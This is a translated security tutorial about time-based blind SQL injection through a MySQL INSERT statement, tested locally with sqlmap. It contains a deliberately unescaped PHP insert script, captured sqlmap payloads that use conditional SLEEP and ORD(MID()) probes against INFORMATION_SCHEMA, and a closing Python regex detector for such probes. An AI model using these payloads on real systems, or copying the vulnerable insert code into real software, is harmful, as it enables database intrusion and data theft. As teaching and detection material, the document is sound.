MySQL injection through INSERT: time-based blind injection in a MySQL INSERT | CN-SEC 中文网

Summary

First create a database and a table:

create database blog;

create table admin(id int primary key auto_increment,email varchar(500));

Write an insert.php so that sqlmap has something to run against:

<?php
// Deliberately vulnerable test script: the email parameter is placed in the
// INSERT statement without any escaping, which is what sqlmap will exercise.
$conn = mysql_connect("localhost", "root", "yourpass");
mysql_select_db("blog", $conn);   // the database created above is "blog"
if (isset($_GET["email"])) {
    $email = $_GET["email"];
    mysql_query("insert into admin(email) values('$email')", $conn);
}
?>

Use Seay's MySQL monitor to watch the statements the database actually executes; this is more convenient than capturing packets.

sqlmap -u http://127.0.0.1/[email protected]

The test finds a time-based injection; the payload is [email protected]' and sleep(5) and 'ufwy'='ufwy

So the corresponding statement executed by the database should be:

insert into admin(email) values('[email protected]' and sleep(5) and 'ufwy'='ufwy');

Look in the MySQL monitor at how it runs --dbs:

insert into admin(email)values('[email protected]' AND 4830=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1)) > 51),SLEEP(5),4830) AND 'XDSc'='XDSc')

insert into admin(email)values('[email protected]' AND 6499=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1)) > 64),SLEEP(2),6499) AND 'ngXr'='ngXr')

-D blog --tables

insert into admin(email)values('[email protected]' AND 3039=IF((ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x626c6f67 LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND 'sAEl'='sAEl')

-D blog -T admin --dump

The dump did not come out; time-based injection is very limited. There is also INSERT error-based injection, but it does not apply to the situation above.

In short, the core of INSERT INTO time-based injection is:

insert into admin(email) values('[email protected]' and if(true,sleep(5),0));
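As an added example (not code from the post), here is a small Python checker that scans statements captured by a query monitor like the one used above and flags the pattern seen in the sqlmap runs: a SLEEP/BENCHMARK delay, made conditional with IF, driven by an ORD(MID(...)) single-character probe, with a tautology such as 'XDSc'='XDSc' closing the string. It also decodes hex literals like 0x626c6f67 so the reviewer can see which schema the probe targets. The sample statements are the ones shown on the page (with its placeholder e-mail) plus one constructed benign insert as a control.

```python
import re

# Statements captured by the MySQL monitor in the post (the e-mail value is the
# page's own placeholder), plus one constructed benign insert as a control.
CAPTURED = [
    "insert into admin(email)values('[email protected]' AND 4830=IF((ORD(MID((SELECT "
    "IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA"
    ".SCHEMATA),1,1)) > 51),SLEEP(5),4830) AND 'XDSc'='XDSc')",
    "insert into admin(email)values('[email protected]' AND 3039=IF((ORD(MID((SELECT "
    "IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE "
    "table_schema=0x626c6f67 LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND 'sAEl'='sAEl')",
    "insert into admin(email) values('alice@example.com')",
]

DELAY_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(\s*(\d+)", re.I)            # the delay primitive
COND_RE = re.compile(r"\bIF\s*\(", re.I)                                    # delay made conditional
PROBE_RE = re.compile(r"\b(ORD|ASCII)\s*\(\s*(MID|SUBSTR\w*)\s*\(", re.I)    # one-character probe
TAUTOLOGY_RE = re.compile(r"'(\w+)'\s*=\s*'\1'")                            # 'XDSc'='XDSc' closes the string
SCHEMA_RE = re.compile(r"information_schema\.(\w+)", re.I)                  # metadata lookups
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2}){2,})\b", re.I)                   # 0x626c6f67 -> 'blog'

def decode_hex_literals(sql):
    """Decode multi-byte hex literals that are printable ASCII (sqlmap hex-encodes names)."""
    decoded = []
    for h in HEX_RE.findall(sql):
        text = bytes.fromhex(h).decode("ascii", errors="replace")
        if text.isprintable() and "\ufffd" not in text:
            decoded.append(text)
    return decoded

def analyze_statement(sql):
    """Return a finding for a time-based blind probe, or None for an ordinary INSERT."""
    delay = DELAY_RE.search(sql)
    if not delay:
        return None
    checks = [("conditional", COND_RE), ("char-probe", PROBE_RE), ("tautology-close", TAUTOLOGY_RE)]
    return {
        "delay_seconds": int(delay.group(2)),
        "indicators": ["delay"] + [name for name, rx in checks if rx.search(sql)],
        "schema_tables": sorted({t.lower() for t in SCHEMA_RE.findall(sql)}),
        "hex_literals": decode_hex_literals(sql),
    }

def scan_log(lines):
    """(index, finding) for every captured statement that looks like a probe."""
    results = [(i, analyze_statement(line)) for i, line in enumerate(lines)]
    return [(i, f) for i, f in results if f]
```

A finding with all four indicators against an INSERT is a strong signal of automated time-based probing, and the decoded hex literal tells you which schema the probe had already reached.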
